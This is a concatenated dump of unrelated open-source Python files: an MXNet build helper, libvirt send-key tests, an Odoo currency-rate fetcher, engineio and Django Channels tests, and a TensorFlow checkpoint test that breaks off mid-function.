libs = list(glob.iglob('**/*.lib', recursive=True))
dlls = list(glob.iglob('**/*.dll', recursive=True))
os.makedirs(pkgdir_lib, exist_ok=True)
for lib in libs:
logging.info("packing lib: %s", lib)
shutil.copy(lib, pkgdir_lib)
for dll in dlls:
logging.info("packing dll: %s", dll)
shutil.copy(dll, pkgdir_lib)
os.chdir(get_mxnet_root())
logging.info('packing python bindings')
copy_tree('python', j(pkgdir, 'python'))
logging.info('packing headers')
copy_tree('include', j(pkgdir, 'include'))
logging.info("Compressing package: %s", pkgfile)
check_call(['7z', 'a', pkgfile, pkgdir])
def nix_build(args):
path = args.output
os.makedirs(path, exist_ok=True)
with remember_cwd():
os.chdir(path)
logging.info("Generating project with CMake")
check_call("cmake \
-DUSE_CUDA=OFF \
-DUSE_OPENCV=OFF \
-DUSE_OPENMP=OFF \
-DCMAKE_BUILD_TYPE=Debug \
-GNinja ..", shell=True)
check_call("ninja", shell=True)
def main():
logging.getLogger().setLevel(logging.INFO)
logging.basicConfig(format='%(asctime)-15s %(message)s')
logging.info("MXNet Windows build helper")
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output",
help="output directory",
default='build',
type=str)
parser.add_argument("--vcvars",
help="vcvars batch file location, typically inside vs studio install dir",
default=KNOWN_VCVARS['VS 2015'],
type=str)
parser.add_argument("--arch",
help="architecture",
default='x64',
type=str)
parser.add_argument("-f", "--flavour",
help="build flavour",
default='WIN_CPU',
choices=[x.name for x in BuildFlavour],
type=str)
args = parser.parse_args()
logging.info("Build flavour: %s", args.flavour)
system = platform.system()
if system == 'Windows':
logging.info("Detected Windows platform")
if 'OpenBLAS_HOME' not in os.environ:
os.environ["OpenBLAS_HOME"] = "C:\\mxnet\\openblas"
if 'OpenCV_DIR' not in os.environ:
os.environ["OpenCV_DIR"] = "C:\\mxnet\\opencv_vc14"
if 'CUDA_PATH' not in os.environ:
os.environ["CUDA_PATH"] = "C:\\CUDA\\v8.0"
windows_build(args)
elif system == 'Linux' or system == 'Darwin':
nix_build(args)
else:
logging.error("Don't know how to build for {} yet".format(platform.system()))
return 0
if __name__ == '__main__':
sys.exit(main())
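# Illustrative invocation (path to the vcvars batch file is an example only):
#   python ci/build_windows.py --flavour WIN_GPU --vcvars "C:\path\to\vcvarsx86_amd64.bat" -o build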
|
liuzzfnst/tp-libvirt
|
refs/heads/master
|
libvirt/tests/src/virsh_cmd/domain/virsh_sendkey.py
|
3
|
import logging
import time
from autotest.client.shared import error
from virttest import virsh
from provider import libvirt_version
def run(test, params, env):
"""
Test send-key command, include all types of codeset and sysrq
For normal sendkey test, we create a file to check the command
execute by send-key. For sysrq test, check the /var/log/messages
and guest status
"""
if not virsh.has_help_command('send-key'):
raise error.TestNAError("This version of libvirt does not support "
"the send-key test")
vm_name = params.get("main_vm", "virt-tests-vm1")
status_error = ("yes" == params.get("status_error", "no"))
options = params.get("sendkey_options", "")
sysrq_test = ("yes" == params.get("sendkey_sysrq", "no"))
sleep_time = int(params.get("sendkey_sleeptime", 2))
readonly = params.get("readonly", False)
username = params.get("username")
password = params.get("password")
create_file = params.get("create_file_name")
uri = params.get("virsh_uri")
unprivileged_user = params.get('unprivileged_user')
if unprivileged_user:
if unprivileged_user.count('EXAMPLE'):
unprivileged_user = 'testacl'
if not libvirt_version.version_compare(1, 1, 1):
if params.get('setup_libvirt_polkit') == 'yes':
raise error.TestNAError("API acl test not supported in current"
" libvirt version.")
def send_line(send_str):
"""
send string to guest with send-key and end with Enter
"""
for send_ch in list(send_str):
virsh.sendkey(vm_name, "KEY_%s" % send_ch.upper(),
ignore_status=False)
virsh.sendkey(vm_name, "KEY_ENTER",
ignore_status=False)
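    # Illustrative example: send_line("root") results in virsh send-key calls for
    # KEY_R, KEY_O, KEY_O, KEY_T followed by a final KEY_ENTER.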
vm = env.get_vm(vm_name)
session = vm.wait_for_login()
if sysrq_test:
# Is 'rsyslog' installed on guest? It'll be what writes out
# to /var/log/messages
rpm_stat = session.cmd_status("rpm -q rsyslog")
if rpm_stat != 0:
logging.debug("rsyslog not found in guest installing")
stat_install = session.cmd_status("yum install -y rsyslog", 300)
if stat_install != 0:
raise error.TestFail("Fail to install rsyslog, make"
"sure that you have usable repo in guest")
# clear messages, restart rsyslog, and make sure it's running
session.cmd("echo '' > /var/log/messages")
session.cmd("service rsyslog restart")
ps_stat = session.cmd_status("ps aux |grep rsyslog")
if ps_stat != 0:
raise error.TestFail("rsyslog is not running in guest")
# enable sysrq
session.cmd("echo 1 > /proc/sys/kernel/sysrq")
# make sure the environment is clear
if create_file is not None:
session.cmd("rm -rf %s" % create_file)
try:
# wait for tty1 started
tty1_stat = "ps aux|grep tty[1]"
timeout = 60
while timeout >= 0 and \
session.get_command_status(tty1_stat) != 0:
time.sleep(1)
timeout = timeout - 1
if timeout < 0:
raise error.TestFail("Can not wait for tty1 started in 60s")
# send user and passwd to guest to login
send_line(username)
time.sleep(2)
send_line(password)
time.sleep(2)
output = virsh.sendkey(vm_name, options, readonly=readonly,
unprivileged_user=unprivileged_user,
uri=uri)
time.sleep(sleep_time)
if output.exit_status != 0:
if status_error:
logging.info("Failed to sendkey to guest as expected, Error:"
"%s.", output.stderr)
return
else:
raise error.TestFail("Failed to send key to guest, Error:%s." %
output.stderr)
elif status_error:
raise error.TestFail("Expect fail, but succeed indeed.")
if create_file is not None:
# check if created file exist
cmd_ls = "ls %s" % create_file
sec_status, sec_output = session.get_command_status_output(cmd_ls)
if sec_status == 0:
logging.info("Succeed to create file with send key")
else:
raise error.TestFail("Fail to create file with send key, "
"Error:%s" % sec_output)
elif sysrq_test:
# check /var/log/message info according to different key
# Since there's no guarantee when messages will be written
# we'll do a check and wait loop for up to 60 seconds
timeout = 60
while timeout >= 0:
if "KEY_H" in options:
get_status = session.cmd_status("cat /var/log/messages|"
"grep 'SysRq.*HELP'")
elif "KEY_M" in options:
get_status = session.cmd_status("cat /var/log/messages|"
"grep 'SysRq.*Show Memory'")
elif "KEY_T" in options:
get_status = session.cmd_status("cat /var/log/messages|"
"grep 'SysRq.*Show State'")
elif "KEY_B" in options:
client_session = vm.wait_for_login()
result = virsh.domstate(vm_name, '--reason', ignore_status=True)
output = result.stdout.strip()
logging.debug("The guest state: %s", output)
if not output.count("booted"):
get_status = 1
else:
get_status = 0
client_session.close()
if get_status == 0:
timeout = -1
else:
session.cmd("echo \"virsh sendkey waiting\" >> /var/log/messages")
time.sleep(1)
timeout = timeout - 1
if get_status != 0:
raise error.TestFail("SysRq does not take effect in guest, "
"options is %s" % options)
else:
logging.info("Succeed to send SysRq command")
else:
raise error.TestFail("Test cfg file invalid: either sysrq_params "
"or create_file_name must be defined")
finally:
if create_file is not None:
session.cmd("rm -rf %s" % create_file)
session.close()
|
dhongu/l10n-romania
|
refs/heads/11.0
|
currency_rate_update/services/update_service_PL_NBP.py
|
1
|
# -*- coding: utf-8 -*-
# © 2009 Camptocamp
# © 2009 Grzegorz Grzelak
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from .currency_getter_interface import CurrencyGetterInterface
from datetime import datetime
from odoo.tools import DEFAULT_SERVER_DATE_FORMAT
import logging
_logger = logging.getLogger(__name__)
class PL_NBPGetter(CurrencyGetterInterface):
"""Implementation of Currency_getter_factory interface
for PL NBP service
"""
code = 'PL_NBP'
name = 'National Bank of Poland'
supported_currency_array = [
"AUD", "BGN", "BRL", "CAD", "CHF", "CLP", "CNY", "CZK", "DKK", "EUR",
"GBP", "HKD", "HRK", "HUF", "IDR", "ILS", "INR", "ISK", "JPY", "KRW",
"LTL", "MXN", "MYR", "NOK", "NZD", "PHP", "PLN", "RON", "RUB", "SEK",
"SGD", "THB", "TRY", "UAH", "USD", "XDR", "ZAR"]
def rate_retrieve(self, dom, ns, curr):
""" Parse a dom node to retrieve
currencies data"""
res = {}
xpath_rate_currency = ("/tabela_kursow/pozycja[kod_waluty='%s']/"
"kurs_sredni/text()") % (curr.upper())
xpath_rate_ref = ("/tabela_kursow/pozycja[kod_waluty='%s']/"
"przelicznik/text()") % (curr.upper())
res['rate_currency'] = float(
dom.xpath(xpath_rate_currency, namespaces=ns)[0].replace(',', '.')
)
res['rate_ref'] = float(dom.xpath(xpath_rate_ref, namespaces=ns)[0])
return res
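    # Illustrative fragment of the NBP LastA.xml table matched by the XPaths above
    # (element layout assumed from the expressions, values are examples only):
    #     <pozycja>
    #       <przelicznik>1</przelicznik>
    #       <kod_waluty>USD</kod_waluty>
    #       <kurs_sredni>3,9876</kurs_sredni>
    #     </pozycja>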
def get_updated_currency(self, currency_array, main_currency,
max_delta_days):
"""implementation of abstract method of Curreny_getter_interface"""
# LastA.xml is always the most recent one
url = 'http://www.nbp.pl/kursy/xml/LastA.xml'
# We do not want to update the main currency
if main_currency in currency_array:
currency_array.remove(main_currency)
# Move to new XML lib cf Launchpad bug #645263
from lxml import etree
_logger.debug("NBP.pl currency rate service : connecting...")
rawfile = self.get_url(url)
dom = etree.fromstring(rawfile)
ns = {} # Cool, there are no namespaces !
_logger.debug("NBP.pl sent a valid XML file")
rate_date = dom.xpath('/tabela_kursow/data_publikacji/text()',
namespaces=ns)[0]
rate_date_datetime = datetime.strptime(rate_date,
DEFAULT_SERVER_DATE_FORMAT)
self.check_rate_date(rate_date_datetime, max_delta_days)
# We dynamically update supported currencies
self.supported_currency_array = dom.xpath(
'/tabela_kursow/pozycja/kod_waluty/text()',
namespaces=ns
)
self.supported_currency_array.append('PLN')
_logger.debug("Supported currencies = %s" %
self.supported_currency_array)
self.validate_cur(main_currency)
if main_currency != 'PLN':
main_curr_data = self.rate_retrieve(dom, ns, main_currency)
# 1 MAIN_CURRENCY = main_rate PLN
main_rate = (main_curr_data['rate_currency'] /
main_curr_data['rate_ref'])
for curr in currency_array:
self.validate_cur(curr)
if curr == 'PLN':
rate = main_rate
else:
curr_data = self.rate_retrieve(dom, ns, curr)
# 1 MAIN_CURRENCY = rate CURR
if main_currency == 'PLN':
rate = curr_data['rate_ref'] / curr_data['rate_currency']
else:
rate = (main_rate * curr_data['rate_ref'] /
curr_data['rate_currency'])
self.updated_currency[curr] = rate
_logger.debug("Rate retrieved : %s = %s %s" %
(main_currency, rate, curr))
return self.updated_currency, self.log_info
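# Worked example (hypothetical figures, added for illustration only): suppose
# main_currency is EUR, the table lists EUR with kurs_sredni 4,50 and
# przelicznik 1, and USD with kurs_sredni 3,60 and przelicznik 1. Then
#   main_rate = 4.50 / 1 = 4.50          # 1 EUR = 4.50 PLN
#   rate(USD) = 4.50 * 1 / 3.60 = 1.25   # 1 EUR = 1.25 USD
#   rate(PLN) = main_rate = 4.50         # 1 EUR = 4.50 PLN
# which matches the branches in get_updated_currency() above.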
|
youprofit/NewsBlur
|
refs/heads/master
|
apps/recommendations/tests.py
|
1940
|
"""
This file demonstrates two different styles of tests (one doctest and one
unittest). These will both pass when you run "manage.py test".
Replace these with more appropriate tests for your application.
"""
from django.test import TestCase
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.failUnlessEqual(1 + 1, 2)
__test__ = {"doctest": """
Another way to test that 1 + 1 is equal to 2.
>>> 1 + 1 == 2
True
"""}
|
fogcitymarathoner/djfb
|
refs/heads/master
|
facebook_example/member/tests.py
|
1940
|
"""
This file demonstrates two different styles of tests (one doctest and one
unittest). These will both pass when you run "manage.py test".
Replace these with more appropriate tests for your application.
"""
from django.test import TestCase
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.failUnlessEqual(1 + 1, 2)
__test__ = {"doctest": """
Another way to test that 1 + 1 is equal to 2.
>>> 1 + 1 == 2
True
"""}
|
NSLS-II-HXN/PyXRF
|
refs/heads/master
|
pyxrf/api.py
|
2
|
# Use this file if you are importing into an interactive IPython session.
# Use 'pyxrf.api_dev' if you are importing PyXRF API into a custom script.
from .api_dev import * # noqa: F401, F403
def pyxrf_api():
r"""
=======================================================================================
Module ``pyxrf.api`` supports the following functions:
Loading data:
make_hdf - load XRF mapping data from databroker
Data processing:
pyxrf_batch - batch processing of XRF maps
build_xanes_map - generation and processing of XANES maps
Dask client:
dask_client_create - returns Dask client for use in batch scripts
Simulation of datasets:
gen_hdf5_qa_dataset - generate quantitative analysis dataset
gen_hdf5_qa_dataset_preset_1 - generate the dataset based on preset parameters
VIEW THIS MESSAGE AT ANY TIME: pyxrf_api()
For more detailed descriptions of the supported functions, type ``help(<function-name>)``
in IPython command prompt.
=========================================================================================
"""
print(pyxrf_api.__doc__)
pyxrf_api()
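# Usage sketch (illustrative, not part of the original file): in an IPython
# session the wildcard import pulls in the public API, and the summary above is
# printed once on import because pyxrf_api() is called at module level.
#
#   In [1]: from pyxrf.api import *   # prints the summary above
#   In [2]: pyxrf_api()               # show it again at any time
#
# Scripts should import 'pyxrf.api_dev' instead, as noted at the top of the file.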
|
pombredanne/python-engineio
|
refs/heads/master
|
tests/test_socket.py
|
2
|
import time
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
from engineio import packet
from engineio import payload
from engineio import socket
class TestSocket(unittest.TestCase):
def _get_mock_server(self):
mock_server = mock.Mock()
mock_server.ping_timeout = 0.1
mock_server.ping_interval = 0.1
try:
import queue
except ImportError:
import Queue as queue
import threading
mock_server.async = {'threading': threading,
'thread_class': 'Thread',
'queue': queue,
'queue_class': 'Queue',
'websocket': None}
return mock_server
def test_create(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertEqual(s.server, mock_server)
self.assertEqual(s.sid, 'sid')
self.assertFalse(s.upgraded)
self.assertFalse(s.closed)
self.assertTrue(hasattr(s.queue, 'get'))
self.assertTrue(hasattr(s.queue, 'put'))
self.assertTrue(hasattr(s.queue, 'task_done'))
self.assertTrue(hasattr(s.queue, 'join'))
def test_empty_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(IOError, s.poll)
def test_poll(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
self.assertEqual(s.poll(), [pkt1, pkt2])
def test_ping_pong(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.PING, data='abc'))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertEqual(r[0].encode(), b'3abc')
def test_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
self.assertRaises(ValueError, s.receive, packet.Packet(packet.OPEN))
def test_timeout(self):
mock_server = self._get_mock_server()
mock_server.ping_interval = -0.1
s = socket.Socket(mock_server, 'sid')
s.last_ping = time.time() - 1
s.close = mock.MagicMock()
s.send('packet')
s.close.assert_called_once_with(wait=False, abort=True)
def test_polling_read(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
s.send(pkt1)
s.send(pkt2)
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
packets = s.handle_get_request(environ, start_response)
self.assertEqual(packets, [pkt1, pkt2])
def test_polling_read_error(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo'}
start_response = mock.MagicMock()
self.assertRaises(IOError, s.handle_get_request, environ,
start_response)
def test_polling_write(self):
mock_server = self._get_mock_server()
mock_server.max_http_buffer_size = 1000
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
s.handle_post_request(environ)
self.assertEqual(s.receive.call_count, 2)
def test_polling_write_too_large(self):
mock_server = self._get_mock_server()
pkt1 = packet.Packet(packet.MESSAGE, data='hello')
pkt2 = packet.Packet(packet.MESSAGE, data='bye')
p = payload.Payload(packets=[pkt1, pkt2]).encode()
mock_server.max_http_buffer_size = len(p) - 1
s = socket.Socket(mock_server, 'foo')
s.receive = mock.MagicMock()
environ = {'REQUEST_METHOD': 'POST', 'QUERY_STRING': 'sid=foo',
'CONTENT_LENGTH': len(p), 'wsgi.input': six.BytesIO(p)}
self.assertRaises(ValueError, s.handle_post_request, environ)
def test_upgrade_handshake(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'foo')
s._upgrade_websocket = mock.MagicMock()
environ = {'REQUEST_METHOD': 'GET', 'QUERY_STRING': 'sid=foo',
'HTTP_CONNECTION': 'Foo,Upgrade,Bar',
'HTTP_UPGRADE': 'websocket'}
start_response = mock.MagicMock()
s.handle_get_request(environ, start_response)
s._upgrade_websocket.assert_called_once_with(environ, start_response)
def test_upgrade(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
mock_server.async['websocket_class'] = 'WebSocket'
mock_ws = mock.MagicMock()
mock_server.async['websocket'].WebSocket.configure_mock(
return_value=mock_ws)
s = socket.Socket(mock_server, 'sid')
environ = "foo"
start_response = "bar"
s._upgrade_websocket(environ, start_response)
mock_server.async['websocket'].WebSocket.assert_called_once_with(
s._websocket_handler)
mock_ws.assert_called_once_with(environ, start_response)
def test_upgrade_twice(self):
mock_server = self._get_mock_server()
mock_server.async['websocket'] = mock.MagicMock()
s = socket.Socket(mock_server, 'sid')
s.upgraded = True
environ = "foo"
start_response = "bar"
self.assertRaises(IOError, s._upgrade_websocket,
environ, start_response)
def test_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.receive(packet.Packet(packet.UPGRADE))
r = s.poll()
self.assertEqual(len(r), 1)
self.assertEqual(r[0].encode(), b'6')
def test_upgrade_no_probe(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
ws = mock.MagicMock()
ws.wait.return_value = packet.Packet(packet.NOOP).encode(
always_bytes=False)
s._websocket_handler(ws)
self.assertFalse(s.upgraded)
def test_upgrade_no_upgrade_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
ws = mock.MagicMock()
probe = six.text_type('probe')
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.NOOP).encode(always_bytes=False)]
s._websocket_handler(ws)
ws.send.assert_called_once_with(packet.Packet(
packet.PONG, data=probe).encode(always_bytes=False))
self.assertEqual(s.queue.get().packet_type, packet.NOOP)
self.assertFalse(s.upgraded)
def test_websocket_read_write(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', 'foo'),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_websocket_read_write_fail(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
RuntimeError]
ws.send.side_effect = [None, RuntimeError]
s._websocket_handler(ws)
time.sleep(0)
self.assertEqual(s.closed, True)
def test_websocket_ignore_invalid_packet(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue.join = mock.MagicMock(return_value=None)
foo = six.text_type('foo')
bar = six.text_type('bar')
probe = six.text_type('probe')
s.poll = mock.MagicMock(side_effect=[
[packet.Packet(packet.MESSAGE, data=bar)], IOError])
ws = mock.MagicMock()
ws.wait.side_effect = [
packet.Packet(packet.PING, data=probe).encode(
always_bytes=False),
packet.Packet(packet.UPGRADE).encode(always_bytes=False),
packet.Packet(packet.OPEN).encode(always_bytes=False),
packet.Packet(packet.MESSAGE, data=foo).encode(
always_bytes=False),
None]
s._websocket_handler(ws)
time.sleep(0)
self.assertTrue(s.upgraded)
self.assertEqual(mock_server._trigger_event.call_count, 2)
mock_server._trigger_event.assert_has_calls([
mock.call('message', 'sid', foo),
mock.call('disconnect', 'sid')])
ws.send.assert_called_with('4bar')
def test_send_after_close(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.close(wait=False)
self.assertRaises(IOError, s.send, packet.Packet(packet.NOOP))
def test_close_and_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=True)
s.queue.join.assert_called_once_with()
def test_close_without_wait(self):
mock_server = self._get_mock_server()
s = socket.Socket(mock_server, 'sid')
s.queue = mock.MagicMock()
s.close(wait=False)
self.assertEqual(s.queue.join.call_count, 0)
|
kirca/OpenUpgrade
|
refs/heads/8.0
|
addons/crm_partner_assign/crm_lead.py
|
112
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class crm_lead(osv.osv):
_inherit = 'crm.lead'
def get_interested_action(self, cr, uid, interested, context=None):
try:
model, action_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'crm_lead_channel_interested_act')
except ValueError:
raise osv.except_osv(_('Error!'), _("The CRM Channel Interested Action is missing"))
action = self.pool[model].read(cr, uid, [action_id], context=context)[0]
action_context = eval(action['context'])
action_context['interested'] = interested
action['context'] = str(action_context)
return action
def case_interested(self, cr, uid, ids, context=None):
return self.get_interested_action(cr, uid, True, context=context)
def case_disinterested(self, cr, uid, ids, context=None):
return self.get_interested_action(cr, uid, False, context=context)
def assign_salesman_of_assigned_partner(self, cr, uid, ids, context=None):
salesmans_leads = {}
for lead in self.browse(cr, uid, ids, context=context):
if (lead.stage_id.probability > 0 and lead.stage_id.probability < 100) or lead.stage_id.sequence == 1:
if lead.partner_assigned_id and lead.partner_assigned_id.user_id and lead.partner_assigned_id.user_id != lead.user_id:
salesman_id = lead.partner_assigned_id.user_id.id
if salesmans_leads.get(salesman_id):
salesmans_leads[salesman_id].append(lead.id)
else:
salesmans_leads[salesman_id] = [lead.id]
for salesman_id, lead_ids in salesmans_leads.items():
salesteam_id = self.on_change_user(cr, uid, lead_ids, salesman_id, context=None)['value'].get('section_id')
self.write(cr, uid, lead_ids, {'user_id': salesman_id, 'section_id': salesteam_id}, context=context)
|
Kussie/HTPC-Manager
|
refs/heads/master2
|
libs/pyasn1/codec/ber/eoo.py
|
407
|
from pyasn1.type import base, tag
class EndOfOctets(base.AbstractSimpleAsn1Item):
defaultValue = 0
tagSet = tag.initTagSet(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x00)
)
endOfOctets = EndOfOctets()
|
pombredanne/django-hosts
|
refs/heads/master
|
django_hosts/tests/hosts/appended.py
|
4
|
from django_hosts import patterns, host
from django_hosts.tests.hosts.simple import host_patterns
host_patterns += patterns('',
host(r'special', 'django_hosts.tests.urls.simple', name='special'),
)
|
ststaynov/fishGame
|
refs/heads/master
|
chat/tests/test_consumers.py
|
9
|
import json
import pytest
from asgiref.inmemory import ChannelLayer as InMemoryChannelLayer
from channels import Group
from channels.handler import AsgiRequest
from channels.message import Message
from django.contrib.sessions.backends.file import SessionStore as FileSessionStore
from chat.consumers import ws_connect, ws_receive, ws_disconnect
from chat.models import Room
@pytest.fixture
def message_factory(settings, tmpdir):
def factory(name, **content):
channel_layer = InMemoryChannelLayer()
message = Message(content, name, channel_layer)
settings.SESSION_FILE_PATH = str(tmpdir)
message.channel_session = FileSessionStore()
return message
return factory
@pytest.mark.django_db
def test_ws_connect(message_factory):
r = Room.objects.create(label='room1')
message = message_factory('test',
path = b'/chat/room1',
client = ['10.0.0.1', 12345],
reply_channel = u'test-reply',
)
ws_connect(message)
assert 'test-reply' in message.channel_layer._groups['chat-room1']
assert message.channel_session['room'] == 'room1'
@pytest.mark.django_db
def test_ws_receive(message_factory):
r = Room.objects.create(label='room1')
message = message_factory('test',
text = json.dumps({'handle': 'H', 'message': 'M'})
)
# Normally this would happen when the person joins the room, but mock
# it up manually here.
message.channel_session['room'] = 'room1'
Group('chat-room1', channel_layer=message.channel_layer).add(u'test-reply')
ws_receive(message)
_, reply = message.channel_layer.receive_many([u'test-reply'])
reply = json.loads(reply['text'])
assert reply['message'] == 'M'
assert reply['handle'] == 'H'
@pytest.mark.django_db
def test_ws_disconnect(message_factory):
r = Room.objects.create(label='room1')
message = message_factory('test', reply_channel=u'test-reply1')
Group('chat-room1', channel_layer=message.channel_layer).add(u'test-reply1')
Group('chat-room1', channel_layer=message.channel_layer).add(u'test-reply2')
message.channel_session['room'] = 'room1'
ws_disconnect(message)
assert 'test-reply1' not in message.channel_layer._groups['chat-room1']
|
rmmariano/ProjScriptsTekton
|
refs/heads/master
|
backend/appengine/routes/meuperfil/home.py
|
2
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from config.template_middleware import TemplateResponse
from gaecookie.decorator import no_csrf
from gaepermission.decorator import login_not_required
__author__ = 'Rodrigo'
@login_not_required
@no_csrf
def index():
return TemplateResponse(template_path='/meuperfil/caixaesquerda/editarmeuperfil.html')
|
pcm17/tensorflow
|
refs/heads/master
|
tensorflow/contrib/framework/python/framework/checkpoint_utils_test.py
|
23
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for checkpoints tools."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.contrib.framework.python.framework import checkpoint_utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver as saver_lib
def _create_checkpoints(sess, checkpoint_dir):
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
checkpoint_state_name = "checkpoint"
v1 = variable_scope.get_variable("var1", [1, 10])
v2 = variable_scope.get_variable("var2", [10, 10])
v3 = variable_scope.get_variable("var3", [100, 100])
with variable_scope.variable_scope("useful_scope"):
v4 = variable_scope.get_variable("var4", [9, 9])
sess.run(variables.global_variables_initializer())
v1_value, v2_value, v3_value, v4_value = sess.run([v1, v2, v3, v4])
saver = saver_lib.Saver()
saver.save(
sess,
checkpoint_prefix,
global_step=0,
latest_filename=checkpoint_state_name)
return v1_value, v2_value, v3_value, v4_value
def _create_partition_checkpoints(sess, checkpoint_dir):
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
checkpoint_state_name = "checkpoint"
with variable_scope.variable_scope("scope"):
v1 = variable_scope.get_variable(
name="var1",
shape=[100, 100],
initializer=init_ops.truncated_normal_initializer(0.5),
partitioner=partitioned_variables.min_max_variable_partitioner(
max_partitions=5, axis=0, min_slice_size=8 << 10))
sess.run(variables.global_variables_initializer())
v1_value = sess.run(v1._get_variable_list())
saver = saver_lib.Saver()
saver.save(
sess,
checkpoint_prefix,
global_step=0,
latest_filename=checkpoint_state_name)
return v1_value
class CheckpointsTest(test.TestCase):
def testNoCheckpoints(self):
checkpoint_dir = self.get_temp_dir() + "/no_checkpoints"
with self.assertRaises(errors_impl.OpError):
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var1"), [])
def testNoTensor(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
_, _, _, _ = _create_checkpoints(session, checkpoint_dir)
with self.assertRaises(errors_impl.OpError):
self.assertAllEqual(
checkpoint_utils.load_variable(checkpoint_dir, "var5"), [])
def testGetTensor(self):
checkpoint_dir = self.get_temp_dir()
with self.test_session() as session:
